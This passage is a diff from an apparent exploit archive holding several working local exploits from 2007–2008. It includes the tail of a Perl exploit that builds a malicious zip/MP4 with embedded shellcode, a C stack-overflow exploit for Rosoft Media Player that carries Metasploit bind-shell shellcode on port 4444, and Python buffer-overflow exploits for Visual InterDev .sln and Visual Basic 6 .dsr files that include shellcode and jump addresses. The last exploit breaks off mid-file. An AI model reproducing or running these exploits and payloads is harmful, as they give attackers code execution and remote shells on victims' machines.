+"\x4A\x69\x91\x50\x93\xBD\xF3\xE6\x79\x5D\xCE\x70\x20\xD9\xF0". +"\xD6\x7B\xE4\x8B\xE4\x4E\x67\xD5\x2C\x29\x4F\x8F\x3D\x6B\x52". +"\xBD\x27\xE8\x0E\x84\xF4\xF1\x33\xE7\x54\x07\x75\x79\x0A\x8E". +"\x9B\x06\xEB\x2B\xC3\x41\x5F\x75\xCC\x95\x11\x16\x95\xD0\x57". +"\x0E\x77\x7B\x43\x3E\x29\x87\x7E\xE1\xB8\xEE\x63\x58\xA7\xDB". +"\xD9\x24\xE5\x69\xB1\xFD\x3A\xEC\x76\xBB\x14\x67\xB8\x6A\xBC". +"\x55\x52\xFE\x08\xC7\x86\x44\x2E\xCD\xE9\x0C\x07\x02\x52\xA6". +"\xC5\x5E\xE4\x9D\x56\x57\xED\x09\x25\xD7\x67\xA4\x66\xA5\xA6". +"\xA5\xA6\xDB\x2F\x4C\xFE\x65\x9D\xD7\xE5\x9B\xE6\xF5\x7B\x92". +"\x33\x53\x47\xA7\x3A\xE4\x9C\x5B\x2F\x12\xBA\x57\xBF\xC7\xA9". +"\xC7\xAC\x5C\x01\x7F\xAA\xB3\xA6\xA6\xCA\x93\x6A\x5E\xAE\x47". +"\x52\xED\xF4\x7B\x22\x0D\x4E\x9C\x34\xA5\x48\xAA\x73\x63\x3B". +"\x4A\xB6\xF7\xC9\xCA\xF8\x6C\x25\x2D\xD3\x9E\x6E\x7E\x93\x53". +"\x60\x37\x2B\xD9\x19\x38\x27\xCB\xEE\xE8\xAB\xA4\x8F\xCE\x33". +"\xCC\x4A\x5A\x96\x79\x4E\x9A\x23\x3D\x1F\x95\xD1\x19\xD2\x78". +"\xD3\x09\x8C\xF0\xC7\xB1\x23\xF4\x84\x66\x5C\x9A\x9F\x9F\x37". +"\xE3\x17\xF9\xFA\xD0\x98\xD8\x81\xA6\xA5\x5F\x60\x14\xE4\x67". +"\x66\x67\x39\x8C\x82\xBC\xD1\x79\x0E\x23\x2F\x23\x2F\x7B\x5C". +"\x46\x5A\x66\x46\x76\x81\xC3\x9E\x61\x64\x8E\xCB\xBB\x20\xC7". +"\x9E\x9D\xED\x90\x8E\x4F\x7A\x7D\x76\xD0\x23\x8D\xFE\x07\x50". +"\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36". +"\xC5\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00". +"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". +"\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34". +"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x4C\x00\x00". +"\x00\xD6\x0A\x00\x00\x00\x00"; + +my $shellcode = # code 724982 +"\x2B\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13". +"\xC6\x5A\x9C\xA1\x83\xEB\xFC\xE2\xF4\x3A\x30\x77\xEC\x2E\xA3". +"\x63\x5E\x39\x3A\x17\xCD\xE2\x7E\x17\xE4\xFA\xD1\xE0\xA4\xBE". 
+"\x5B\x73\x2A\x89\x42\x17\xFE\xE6\x5B\x77\xE8\x4D\x6E\x17\xA0". +"\x28\x6B\x5C\x38\x6A\xDE\x5C\xD5\xC1\x9B\x56\xAC\xC7\x98\x77". +"\x55\xFD\x0E\xB8\x89\xB3\xBF\x17\xFE\xE2\x5B\x77\xC7\x4D\x56". +"\xD7\x2A\x99\x46\x9D\x4A\xC5\x76\x17\x28\xAA\x7E\x80\xC0\x05". +"\x6B\x47\xC5\x4D\x19\xAC\x2A\x86\x56\x17\xD1\xDA\xF7\x17\xE1". +"\xCE\x04\xF4\x2F\x88\x54\x70\xF1\x39\x8C\xFA\xF2\xA0\x32\xAF". +"\x93\xAE\x2D\xEF\x93\x99\x0E\x63\x71\xAE\x91\x71\x5D\xFD\x0A". +"\x63\x77\x99\xD3\x79\xC7\x47\xB7\x94\xA3\x93\x30\x9E\x5E\x16". +"\x32\x45\xA8\x33\xF7\xCB\x5E\x10\x09\xCF\xF2\x95\x09\xDF\xF2". +"\x85\x09\x63\x71\xA0\x32\x5C\xA1\xA0\x09\x15\x40\x53\x32\x38". +"\xBB\xB6\x9D\xCB\x5E\x10\x30\x8C\xF0\x93\xA5\x4C\xC9\x62\xF7". +"\xB2\x48\x91\xA5\x4A\xF2\x93\xA5\x4C\xC9\x23\x13\x1A\xE8\x91". +"\xA5\x4A\xF1\x92\x0E\xC9\x5E\x16\xC9\xF4\x46\xBF\x9C\xE5\xF6". +"\x39\x8C\xC9\x5E\x16\x3C\xF6\xC5\xA0\x32\xFF\xCC\x4F\xBF\xF6". +"\xF1\x9F\x73\x50\x28\x21\x30\xD8\x28\x24\x6B\x5C\x52\x6C\xA4". +"\xDE\x8C\x38\x18\xB0\x32\x4B\x20\xA4\x0A\x6D\xF1\xF4\xD3\x38". +"\xE9\x8A\x5E\xB3\x1E\x63\x77\x9D\x0D\xCE\xF0\x97\x0B\xF6\xA0". +"\x97\x0B\xC9\xF0\x39\x8A\xF4\x0C\x1F\x5F\x52\xF2\x39\x8C\xF6". +"\x5E\x39\x6D\x63\x71\x4D\x0D\x60\x22\x02\x3E\x63\x77\x94\xA5". +"\x4C\xC9\x29\x94\x7C\xC1\x95\xA5\x4A\x5E\x16\x5A\x9C\xA1"; + +open(code, ">tempzip.zip") || die "Can't Write temporary File\n"; +binmode (code); +print code $zip_data; +close (code); +print "\nTemporary file ready, patching..\n"; +my $zip = Archive::Zip->new(); +$zip->read( 'tempzip.zip' ) ; +$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' ); +open(code, "+)); +print "\nAddress added, have fun!\n"; +close (code); +#indeed this sploit could have been written better without the ret address hassle, +#but it's intended to be only a POC, not a weapon for kiddies.. + +# milw0rm.com [2007-12-08] diff --git a/platforms/windows/local/4749.c b/platforms/windows/local/4749.c index 03d430048..bc65efef4 100755 --- a/platforms/windows/local/4749.c 
+++ b/platforms/windows/local/4749.c 
@@ -1,116 +1,116 @@
-/* rosoft-player-expl.c: 2007-12-18:
- *
- * Copyright (c) 2007 devcode
- *
- *
- * ^^ D E V C O D E ^^
- *
- * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
- * [0-DAY]
- *
- *
- * Description:
- * A stack overflow occurs when parsing an .m3u file
- * which does not contain any delimiters.
- *
- * Hotfix/Patch:
- * None.
- *
- * Vulnerable systems:
- * Rosoft Media Player <= 4.1.7
- *
- * Tested on:
- * Rosoft Media Player 4.1.7
- *
- * This is a PoC and was created for educational purposes only. The
- * author is not held responsible if this PoC does not work or is
- * used for any other purposes than the one stated above.
- *
- * Notes:
- * Nothing much here, except the player itself is a piece of shit.
- * The vulnerability was found by Juan Pablo Lopez Yacubian
- * (jplopezy_at_gmail.com). Come to think of it, the entire suite
- * of products offered by Rosoft Engineering sucks bawls.
- *
- */
-#include
-#include
-
-/**
- * Invalid chars: 0x1A 0xA 0xD 0x00
- * win32_bind -
- * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
- * http://metasploit.com
- */
-unsigned char uszShellcode[] =
- "\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
- "\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
- "\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
- "\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
- "\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
- "\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
- "\x63\xbc\x7b\x7e\x0c\xb4\xec\x96\xa3\xa1\x2b\x93\xeb\xd3\xc0\x7c"
- "\x20\x9c\x7b\x87\x7c\x3d\x7b\xb7\x68\xce\x98\x79\x2e\x9e\x1c\xa7"
- "\x9f\x46\x96\xa4\x06\xf8\xc3\xc5\x08\xe7\x83\xc5\x3f\xc4\x0f\x27"
- "\x08\x5b\x1d\x0b\x5b\xc0\x0f\x21\x3f\x19\x15\x91\xe1\x7d\xf8\xf5"
- "\x35\xfa\xf2\x08\xb0\xf8\x29\xfe\x95\x3d\xa7\x08\xb6\xc3\xa3\xa4"
- "\x33\xc3\xb3\xa4\x23\xc3\x0f\x27\x06\xf8\xe1\xab\x06\xc3\x79\x16"
- "\xf5\xf8\x54\xed\x10\x57\xa7\x08\xb6\xfa\xe0\xa6\x35\x6f\x20\x9f"
- "\xc4\x3d\xde\x1e\x37\x6f\x26\xa4\x35\x6f\x20\x9f\x85\xd9\x76\xbe"
- "\x37\x6f\x26\xa7\x34\xc4\xa5\x08\xb0\x03\x98\x10\x19\x56\x89\xa0"
- "\x9f\x46\xa5\x08\xb0\xf6\x9a\x93\x06\xf8\x93\x9a\xe9\x75\x9a\xa7"
- "\x39\xb9\x3c\x7e\x87\xfa\xb4\x7e\x82\xa1\x30\x04\xca\x6e\xb2\xda"
- "\x9e\xd2\xdc\x64\xed\xea\xc8\x5c\xcb\x3b\x98\x85\x9e\x23\xe6\x08"
- "\x15\xd4\x0f\x21\x3b\xc7\xa2\xa6\x31\xc1\x9a\xf6\x31\xc1\xa5\xa6"
- "\x9f\x40\x98\x5a\xb9\x95\x3e\xa4\x9f\x46\x9a\x08\x9f\xa7\x0f\x27"
- "\xeb\xc7\x0c\x74\xa4\xf4\x0f\x21\x32\x6f\x20\x9f\x8f\x5e\x10\x97"
- "\x33\x6f\x26\x08\xb0\x90\xf0\xf7";
-
-int main( int argc, char **argv ) {
- FILE *f = NULL;
- char *p = NULL;
-
- printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
- printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );
-
- if ( argc < 2 ) {
- printf( "Usage: %s \n", argv[0] );
- return -1;
- }
-
- f = fopen( argv[1], "w+" );
- if ( !f ) {
- printf( "[-] Unable to create m3u file.\n" );
- return -1;
- }
-
- p = (char *)malloc( 5000 );
- memset( p, 0x41, 5000 );
-
- /**
- * We need a valid address here that contains
- * a value of 0 and is writable, and of course,
- * no 0x00s in the address itself. Try 0x1270FE0
- * if 0x7FFDFFF0 doesn't work.
- */
- memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );
-
- /**
- * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
- */
- memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
- memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );
-
- /**
- * Cleanup
- */
- fputs( p, f );
- fclose( f );
- free( p );
-
- printf( "[*] File generated succesfully!\n" );
- return 0;
-}
-
-// milw0rm.com [2007-12-18]
+/* rosoft-player-expl.c: 2007-12-18:
+ *
+ * Copyright (c) 2007 devcode
+ *
+ *
+ * ^^ D E V C O D E ^^
+ *
+ * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
+ * [0-DAY]
+ *
+ *
+ * Description:
+ * A stack overflow occurs when parsing an .m3u file
+ * which does not contain any delimiters.
+ *
+ * Hotfix/Patch:
+ * None.
+ *
+ * Vulnerable systems:
+ * Rosoft Media Player <= 4.1.7
+ *
+ * Tested on:
+ * Rosoft Media Player 4.1.7
+ *
+ * This is a PoC and was created for educational purposes only. The
+ * author is not held responsible if this PoC does not work or is
+ * used for any other purposes than the one stated above.
+ *
+ * Notes:
+ * Nothing much here, except the player itself is a piece of shit.
+ * The vulnerability was found by Juan Pablo Lopez Yacubian
+ * (jplopezy_at_gmail.com). Come to think of it, the entire suite
+ * of products offered by Rosoft Engineering sucks bawls.
+ *
+ */
+#include
+#include
+
+/**
+ * Invalid chars: 0x1A 0xA 0xD 0x00
+ * win32_bind -
+ * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
+ * http://metasploit.com
+ */
+unsigned char uszShellcode[] =
+ "\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
+ "\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
+ "\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
+ "\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
+ "\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
+ "\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
+ "\x63\xbc\x7b\x7e\x0c\xb4\xec\x96\xa3\xa1\x2b\x93\xeb\xd3\xc0\x7c"
+ "\x20\x9c\x7b\x87\x7c\x3d\x7b\xb7\x68\xce\x98\x79\x2e\x9e\x1c\xa7"
+ "\x9f\x46\x96\xa4\x06\xf8\xc3\xc5\x08\xe7\x83\xc5\x3f\xc4\x0f\x27"
+ "\x08\x5b\x1d\x0b\x5b\xc0\x0f\x21\x3f\x19\x15\x91\xe1\x7d\xf8\xf5"
+ "\x35\xfa\xf2\x08\xb0\xf8\x29\xfe\x95\x3d\xa7\x08\xb6\xc3\xa3\xa4"
+ "\x33\xc3\xb3\xa4\x23\xc3\x0f\x27\x06\xf8\xe1\xab\x06\xc3\x79\x16"
+ "\xf5\xf8\x54\xed\x10\x57\xa7\x08\xb6\xfa\xe0\xa6\x35\x6f\x20\x9f"
+ "\xc4\x3d\xde\x1e\x37\x6f\x26\xa4\x35\x6f\x20\x9f\x85\xd9\x76\xbe"
+ "\x37\x6f\x26\xa7\x34\xc4\xa5\x08\xb0\x03\x98\x10\x19\x56\x89\xa0"
+ "\x9f\x46\xa5\x08\xb0\xf6\x9a\x93\x06\xf8\x93\x9a\xe9\x75\x9a\xa7"
+ "\x39\xb9\x3c\x7e\x87\xfa\xb4\x7e\x82\xa1\x30\x04\xca\x6e\xb2\xda"
+ "\x9e\xd2\xdc\x64\xed\xea\xc8\x5c\xcb\x3b\x98\x85\x9e\x23\xe6\x08"
+ "\x15\xd4\x0f\x21\x3b\xc7\xa2\xa6\x31\xc1\x9a\xf6\x31\xc1\xa5\xa6"
+ "\x9f\x40\x98\x5a\xb9\x95\x3e\xa4\x9f\x46\x9a\x08\x9f\xa7\x0f\x27"
+ "\xeb\xc7\x0c\x74\xa4\xf4\x0f\x21\x32\x6f\x20\x9f\x8f\x5e\x10\x97"
+ "\x33\x6f\x26\x08\xb0\x90\xf0\xf7";
+
+int main( int argc, char **argv ) {
+ FILE *f = NULL;
+ char *p = NULL;
+
+ printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
+ printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );
+
+ if ( argc < 2 ) {
+ printf( "Usage: %s \n", argv[0] );
+ return -1;
+ }
+
+ f = fopen( argv[1], "w+" );
+ if ( !f ) {
+ printf( "[-] Unable to create m3u file.\n" );
+ return -1;
+ }
+
+ p = (char *)malloc( 5000 );
+ memset( p, 0x41, 5000 );
+
+ /**
+ * We need a valid address here that contains
+ * a value of 0 and is writable, and of course,
+ * no 0x00s in the address itself. Try 0x1270FE0
+ * if 0x7FFDFFF0 doesn't work.
+ */
+ memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );
+
+ /**
+ * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
+ */
+ memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
+ memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );
+
+ /**
+ * Cleanup
+ */
+ fputs( p, f );
+ fclose( f );
+ free( p );
+
+ printf( "[*] File generated succesfully!\n" );
+ return 0;
+}
+
+// milw0rm.com [2007-12-18]
diff --git a/platforms/windows/local/4892.py b/platforms/windows/local/4892.py
index e87d799d1..43221d830 100755
--- a/platforms/windows/local/4892.py
+++ b/platforms/windows/local/4892.py
@@ -1,89 +1,89 @@ -#usage: exploit.py FileName - -import sys - -print "------------------------------------------------------------------------" -print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow' -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " I really have much fun exploiting this one :)" -print " We need to patch five exceptions before we can have EIP:\n" -print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL" -print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF" -print "------------------------------------------------------------------------" - -buff = "A" * 1764 - -jumper = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll - -buff2 = "A" * 4 - -buff3 = "A" * 24 - -buff4 = "A" * 16 - -buff5 = "A" * 4 - -nop = "\x90\x90\x90\x90" - -shellcode = \ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ -"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ -"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ -"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ -"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ -"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ -"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ 
-"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ -"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ -"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ -"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - -#execute calc.exe - -buff6 = "A" * 8 - -get_EIP = "\xFF\xB9\x3F\x7E" #call EBP from user32.dll - -buff7 = "A" * 56 - -try: - sln_file = \ - 'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\ - 'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"\n'+\ - 'EndProject\n'+\ - 'Global\n'+\ - ' GlobalSection(LocalDeployment) = postSolution\n'+\ - ' StartupProject = {00000000-0000-0000-0000-000000000000}\n'+\ - ' EndGlobalSection\n'+\ - ' GlobalSection(BuildOrder) = postSolution\n'+\ - ' 0 = {00000000-0000-0000-0000-000000000000}\n'+\ - ' EndGlobalSection\n'+\ - ' GlobalSection(DeploymentRoot) = postSolution\n'+\ - ' EndGlobalSection\n'+\ - 'VersionCompanyName="xxx"\n'+\ - 'EndGlobal' - - out_file = open(sys.argv[1] + ".sln",'w') - out_file.write(sln_file) - out_file.close() - print "\nFILE CREATION COMPLETED!\n" -except: - print " \n -------------------------------------" - print " Usage: exploit.py FileName" - print " -------------------------------------" - print "\nAN ERROR OCCURS DURING FILE CREATION!" 
- -# milw0rm.com [2008-01-11] +#usage: exploit.py FileName + +import sys + +print "------------------------------------------------------------------------" +print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow' +print " author: shinnai" +print " mail: shinnai[at]autistici[dot]org" +print " site: http://shinnai.altervista.org\n" +print " I really have much fun exploiting this one :)" +print " We need to patch five exceptions before we can have EIP:\n" +print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL" +print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF" +print "------------------------------------------------------------------------" + +buff = "A" * 1764 + +jumper = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll + +buff2 = "A" * 4 + +buff3 = "A" * 24 + +buff4 = "A" * 16 + +buff5 = "A" * 4 + +nop = "\x90\x90\x90\x90" + +shellcode = \ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ +"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ +"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ +"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ +"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ +"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ +"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ 
+"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ +"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ +"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ +"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" + +#execute calc.exe + +buff6 = "A" * 8 + +get_EIP = "\xFF\xB9\x3F\x7E" #call EBP from user32.dll + +buff7 = "A" * 56 + +try: + sln_file = \ + 'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\ + 'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"\n'+\ + 'EndProject\n'+\ + 'Global\n'+\ + ' GlobalSection(LocalDeployment) = postSolution\n'+\ + ' StartupProject = {00000000-0000-0000-0000-000000000000}\n'+\ + ' EndGlobalSection\n'+\ + ' GlobalSection(BuildOrder) = postSolution\n'+\ + ' 0 = {00000000-0000-0000-0000-000000000000}\n'+\ + ' EndGlobalSection\n'+\ + ' GlobalSection(DeploymentRoot) = postSolution\n'+\ + ' EndGlobalSection\n'+\ + 'VersionCompanyName="xxx"\n'+\ + 'EndGlobal' + + out_file = open(sys.argv[1] + ".sln",'w') + out_file.write(sln_file) + out_file.close() + print "\nFILE CREATION COMPLETED!\n" +except: + print " \n -------------------------------------" + print " Usage: exploit.py FileName" + print " -------------------------------------" + print "\nAN ERROR OCCURS DURING FILE CREATION!" + +# milw0rm.com [2008-01-11] diff --git a/platforms/windows/local/4938.py b/platforms/windows/local/4938.py index aa35302a8..2fd9b3a15 100755 --- a/platforms/windows/local/4938.py +++ b/platforms/windows/local/4938.py 
@@ -1,127 +1,127 @@ -#usage: exploit.py - -import time - -print "---------------------------------------------------------------------------" -print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n' -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " Once you create the file, open it with Visual Basic 6 and click on" -print " connection or command name." -print "---------------------------------------------------------------------------" - -EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll - -nop = "\x90\x90\x90\x90" - -shellcode = \ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ -"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ -"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ -"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ -"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ -"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ -"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ -"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ -"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ 
-"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ -"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - -try: - choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\ - '3 to quit:\n==> ')) - if choice == 1: - buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop - try: - vb_dsr = \ - 'VERSION 5.00\n'+\ - 'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ - ' ClientHeight = 6315\n'+\ - ' ClientLeft = 0'+\ - ' ClientTop = 0\n'+\ - ' ClientWidth = 7935\n'+\ - ' _ExtentX = 13996\n'+\ - ' _ExtentY = 11139\n'+\ - ' FolderFlags = 1\n'+\ - ' TypeInfoCookie = 